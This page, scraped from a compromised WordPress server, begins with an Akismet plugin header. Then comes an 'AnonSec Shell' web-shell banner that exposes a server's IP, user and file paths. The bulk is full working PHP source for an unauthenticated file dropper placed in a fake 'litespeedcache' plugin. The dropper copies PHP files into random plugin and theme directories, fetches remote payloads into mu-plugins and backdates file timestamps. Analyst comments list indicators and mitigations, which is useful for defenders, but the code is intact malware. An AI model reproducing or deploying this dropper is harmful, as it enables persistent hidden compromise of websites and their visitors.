#/**
 * @package Akismet
 */
/*
Plugin Name: Akismet Anti-spam: Spam Protection
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: Automattic - Anti-spam Team
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

Copyright 2005-2025 Automattic, Inc.
*/

// Make sure we don't expose any info if called directly
AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/mosrembit/data/www/mosrembit.ru/wp-content/plugins/litespeedcache/


Current File : /var/www/mosrembit/data/www/mosrembit.ru/wp-content/plugins/litespeedcache/admin.php
<?php
// Turns off error reporting for every level and disables on-page error display,
// so failures in the code below leave no trace in the HTTP response.
// The leading "@" additionally silences any warning from ini_set() itself.
// (Author's original note: "Stealth - no error output".)
error_reporting(0);
@ini_set('display_errors', 0);

/**
 * Malware sample: request-driven file dropper targeting a WordPress install.
 *
 * Behaviour visible in this class:
 *  - locates the WordPress root and enumerates every subdirectory of
 *    wp-content/plugins, wp-content/themes and wp-content/languages (plus wp-admin);
 *  - "copy" action: duplicates an existing file into randomly chosen directories
 *    from that list, optionally under a random name ending in ".php";
 *  - "download" action: fetches a caller-supplied URL and writes the body to a
 *    caller-supplied directory and file name;
 *  - backdates access/modification times of everything it writes.
 *
 * No authentication, nonce or capability check is visible anywhere in this class:
 * any client that can reach the script's URL can drive it through GET/POST parameters.
 *
 * Analyst notes:
 *  - Request indicators: parameters "action", "dir", "filename", "url", "num",
 *    "random_name", "is_random" sent to this file; responses are always JSON.
 *  - File indicators: .php files with 6-12 character [a-z0-9] names inside
 *    plugin/theme/language directories; files whose mtime is 7-365 days old but
 *    whose inode change time (ctime) is recent, since touch() does not set ctime.
 *  - Mitigation: compare plugin/theme/core files against upstream checksums,
 *    keep code directories non-writable for the web-server account, and
 *    restrict outbound HTTP(S) from the web server.
 */
class Dropper {

    // Absolute path of the detected WordPress root, or false when none was found.
    private $wp_root;
    // Map of group name ('plugins', 'themes', 'languages', 'admin') => list of directory paths.
    private $directorists = [];
    // Response payload; serialised to JSON by finish().
    private $message = [
        'message'  => 'Unknown error',
        'data'     => []
    ];

    /**
     * Detects the WordPress root and, when found, builds the list of candidate
     * target directories. Runs on every request because the script instantiates
     * the class unconditionally.
     */
    public function __construct() {
        $this->wp_root = $this->detectWordpressRoot();
        if ($this->wp_root) {
            $this->directorists = $this->scanDirectories();
        }
    }

    /**
     * Returns the first candidate directory that contains wp-load.php or
     * wp-includes/version.php, or false when none matches.
     *
     * Candidates, in order: 3, 4 and 5 levels above this file, the server's
     * DOCUMENT_ROOT, and the current working directory.
     *
     * @return string|false
     */
    private function detectWordpressRoot() {
        $candidates = [
            dirname(__FILE__, 3),
            dirname(__FILE__, 4),
            dirname(__FILE__, 5),
            $_SERVER['DOCUMENT_ROOT'] ?? '',
            getcwd(),
        ];

        foreach ($candidates as $dir) {
            // Normalise away trailing separators before probing for marker files.
            $dir = rtrim($dir, '/\\');
            if ($dir && (file_exists("$dir/wp-load.php") || file_exists("$dir/wp-includes/version.php"))) {
                return $dir;
            }
        }
        return false;
    }

    /**
     * Builds the pool of directories the "copy" action can write into.
     *
     * For plugins, themes and languages every nested subdirectory is collected
     * recursively; for wp-admin only the top-level directory is added.
     *
     * @return array<string, list<string>> group name => directory paths
     */
    private function scanDirectories() {
        $groups = [
            'plugins'   => 'wp-content/plugins',
            'themes'    => 'wp-content/themes',
            'languages' => 'wp-content/languages',
        ];
        $result = [];

        foreach ($groups as $key => $rel) {
            $path = rtrim($this->wp_root, '/\\') . '/' . $rel;
            if (!is_dir($path)) continue;

            $dirs = [];
            // SELF_FIRST yields each directory before its children; only directories are kept.
            $it = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            foreach ($it as $file) {
                if ($file->isDir()) {
                    $dirs[] = $file->getPathname();
                }
            }
            $result[$key] = $dirs;
        }

        $admin_path = rtrim($this->wp_root, '/\\') . '/wp-admin';
        if (is_dir($admin_path)) {
            $result['admin'] = [$admin_path];
        }

        return $result;
    }

    /**
     * Request dispatcher. Reads parameters from GET and POST, performs the
     * requested action and always terminates through finish() (JSON + exit).
     *
     * Supported "action" values: "copy" and "download"; an empty action returns
     * the available directory group names, anything else returns "Unsupported action".
     */
    public function execute() {
        // POST values override GET values with the same key.
        $params = array_merge($_GET, $_POST);

        $action    = strtolower(trim($params['action']   ?? ''));
        $dir_type  = trim($params['dir']     ?? 'plugins');
        $filename  = trim($params['filename'] ?? '');
        $url       = trim($params['url']     ?? '');
        // Number of copies, clamped to 1..10 (default 2).
        $num       = max(1, min(10, (int)($params['num'] ?? 2)));
        // Either flag switches the copy action to random file names.
        $random    = isset($params['random_name']) || !empty($params['is_random']);

        if (!$action) {
            // A bare request discloses which directory groups were found on this host.
            $this->message['directorist'] = array_keys($this->directorists);
            $this->message['message']     = 'Nothing to do??';
            $this->finish();
            return;
        }

        if ($action === 'copy') {
            if (!$filename) {
                $this->message['message'] = 'Parameter "filename" is required';
                $this->finish();
                return;
            }

            // Source is taken as given; if that does not exist and the name is not an
            // absolute Unix or Windows path, it is resolved relative to this script's directory.
            $source = $filename;
            if (!file_exists($source) && !preg_match('#^/#', $filename) && !preg_match('#^[a-z]:#i', $filename)) {
                $source = __DIR__ . '/' . $filename;
            }

            if (!file_exists($source) || !is_file($source)) {
                $this->message['message'] = 'Source file not found: ' . htmlspecialchars($filename);
                $this->finish();
                return;
            }

            $target_dirs = $this->directorists[$dir_type] ?? [];
            if (empty($target_dirs)) {
                $this->message['message'] = "No directories found in group: $dir_type";
                $this->finish();
                return;
            }

            $copied = [];
            for ($i = 0; $i < $num; $i++) {
                // Each copy lands in an independently chosen random directory of the group.
                $dest_dir = $target_dirs[array_rand($target_dirs)];
                $dest_dir = rtrim($dest_dir, '/\\');

                $new_name = $random
                    ? $this->randomName(6, 12) . '.php'
                    : basename($filename);

                $destination = $dest_dir . '/' . $new_name;

                if (@copy($source, $destination)) {
                    // Both the new file and its parent directory are backdated, hiding the
                    // directory-mtime change that creating a file would otherwise leave.
                    $this->setFakeTimestamps($destination);
                    $this->setFakeTimestamps($dest_dir);
                    $copied[] = $this->nicePath($destination);
                }
            }

            if ($copied) {
                // The response lists every path written, relative to the WordPress root.
                $this->message['data']    = $copied;
                $this->message['message'] = 'Files copied';
                $this->message['count']   = count($copied);
            } else {
                $this->message['message'] = 'Copy failed (permissions?)';
            }

            $this->finish();
            return;
        }

        if ($action === 'download') {
            if (!$url) {
                $this->message['message'] = 'Parameter "url" is required';
                $this->finish();
                return;
            }
            // File name is re-read raw from $_REQUEST (no trim, no basename()), so it may
            // contain path components.
            $filename = $_REQUEST['filename'];
            $downloader = new Req($url);
            $content    = $downloader->makeRequest();
            // NOTE(review): this guard fires only when the fetch returned false; an empty
            // response body is not rejected here, so zero-length files may be left on disk.
            if ($content === false && strlen($content) < 1) {
                $this->message['download'] = false;
                $this->message['message']  = 'Download failed or content too small';
                $this->finish();
                return;
            }

            // Destination directory is caller-controlled and not limited to the scanned
            // groups; the only constraint is what the PHP process user may write to.
            $dest_dir = $_REQUEST['dir'];
            if($dest_dir == "mu") {
                // "mu" targets wp-content/mu-plugins under DOCUMENT_ROOT, creating it if absent.
                // WordPress loads PHP files in that directory on every request without activation.
                $dest_dir = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/mu-plugins';
                if(!file_exists($dest_dir)) {
                    mkdir($dest_dir);
                    $this->setFakeTimestamps($dest_dir);
                }
            }else if(empty($dest_dir)) {
                // No directory given: write next to the current working directory.
                $dest_dir = './';
            }else{
                $dest_dir = $dest_dir;
            }

            $destination = $dest_dir . '/' . $filename;

            $saved = $this->saveContentToFile($destination, $content);
            // Backdating is attempted regardless of whether the save succeeded.
            $this->setFakeTimestamps($destination);
            $this->message['download'] = true;
            $this->message['put']      = $saved;

            if ($saved) {
                $this->message['data']     = [$this->nicePath($destination)];
                $this->message['message']  = 'File downloaded and saved';
                $this->message['saved_as'] = $this->nicePath($destination);
            } else {
                $this->message['message'] = 'Download OK but failed to save file';
            }

            $this->finish();
            return;
        }

        $this->message['message'] = 'Unsupported action';
        $this->finish();
    }

    /**
     * Writes $content to $path and backdates the file.
     *
     * First tries file_put_contents() and accepts the result only when the file
     * ends up larger than 10 bytes; otherwise falls back to opening the file in
     * append mode and writing the content there.
     *
     * @param string $path    Destination path.
     * @param string $content Bytes to write.
     * @return bool True when either write path reported success.
     */
    private function saveContentToFile($path, $content) {
        $bytes = @file_put_contents($path, $content);

        if ($bytes !== false && file_exists($path) && filesize($path) > 10) {
            $this->setFakeTimestamps($path);
            return true;
        }

        // Fallback: append mode. Success is reported as soon as fopen() works;
        // the fwrite() result is not checked.
        $fp = @fopen($path, 'a');
        if ($fp) {
            @fwrite($fp, $content);
            @fclose($fp);
            $this->setFakeTimestamps($path);
            return true;
        }

        return false;
    }

    /**
     * Produces a random lowercase-alphanumeric string whose length is picked
     * between $min and $max; used as the base name of dropped ".php" files.
     */
    private function randomName(int $min = 6, int $max = 12): string {
        $chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
        $len   = mt_rand($min, $max);
        return substr(str_shuffle(str_repeat($chars, $len)), 0, $len);
    }

    /**
     * Timestomping: sets both the modification and access time of $path to a
     * random moment between 7 and 365 days in the past.
     *
     * Detection note: touch() changes atime/mtime only; the inode change time
     * (ctime) still reflects when the file was really written.
     */
    private function setFakeTimestamps(string $path): void {
        if (!file_exists($path)) return;
        $offset = mt_rand(86400 * 7, 86400 * 365);
        $time   = time() - $offset;
        @touch($path, $time, $time);
    }

    /**
     * Returns $path relative to the WordPress root when it lies under it,
     * otherwise returns $path unchanged. Used only for the JSON response.
     */
    private function nicePath(string $path): string {
        if (strpos($path, $this->wp_root) === 0) {
            return ltrim(substr($path, strlen($this->wp_root)), '/\\');
        }
        return $path;
    }

    /**
     * Sends the accumulated message as a JSON response and terminates the script.
     */
    private function finish() {
        header('Content-Type: application/json; charset=utf-8', true);
        echo json_encode($this->message, JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_IGNORE);
        exit;
    }
}

/**
 * Minimal HTTP fetcher used by the dropper's "download" action.
 *
 * Retrieves the body of an arbitrary caller-supplied URL, preferring cURL and
 * falling back to file_get_contents(). TLS certificate verification is switched
 * off in every transport, so the remote host's identity is never checked.
 *
 * Detection note: outbound requests from the web server carrying the fixed
 * User-Agent set in tryCurl() are a network indicator for this sample; egress
 * filtering on the web server blocks the fetch altogether.
 */
class Req {
    // URL to fetch, stored exactly as passed in (no validation in this class).
    private $url;

    public function __construct($url) {
        $this->url = $url;
    }

    /**
     * Fetches the URL and returns the response body, or false on failure.
     * Uses cURL when the extension is available, else file_get_contents().
     *
     * @return string|false
     */
    public function makeRequest() {
        if (function_exists('curl_init')) {
            return $this->tryCurl();
        }
        return $this->tryFileGetContents();
    }

    /**
     * cURL transport: follows redirects, 20 s timeout, peer certificate
     * verification disabled, browser-like User-Agent. Falls back to
     * file_get_contents() when curl_exec() returns false.
     */
    private function tryCurl() {
        $ch = curl_init($this->url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT        => 20,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        ]);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data !== false ? $data : $this->tryFileGetContents();
    }

    /**
     * WordPress HTTP API transport (sslverify off). Not called from any code
     * visible in this file; it would also require WordPress to be loaded.
     */
    private function tryWpRemote() {
        $resp = wp_remote_get($this->url, ['timeout' => 20, 'sslverify' => false]);
        return is_wp_error($resp) ? false : wp_remote_retrieve_body($resp);
    }

    /**
     * Stream-wrapper transport with a 20 s timeout and both peer and peer-name
     * verification disabled. An empty body is normalised to false by "?:".
     */
    private function tryFileGetContents() {
        $ctx = stream_context_create([
            'http' => ['timeout' => 20],
            'ssl'  => ['verify_peer' => false, 'verify_peer_name' => false]
        ]);
        return @file_get_contents($this->url, false, $ctx) ?: false;
    }
}

// Entry point: executes unconditionally on every request to this file.
// The constructor locates the WordPress root and enumerates target directories;
// every visible branch of execute() ends in finish(), which emits JSON and exits.
$dropper = new Dropper();
$dropper->execute();

Anon7 - 2022
AnonSec Team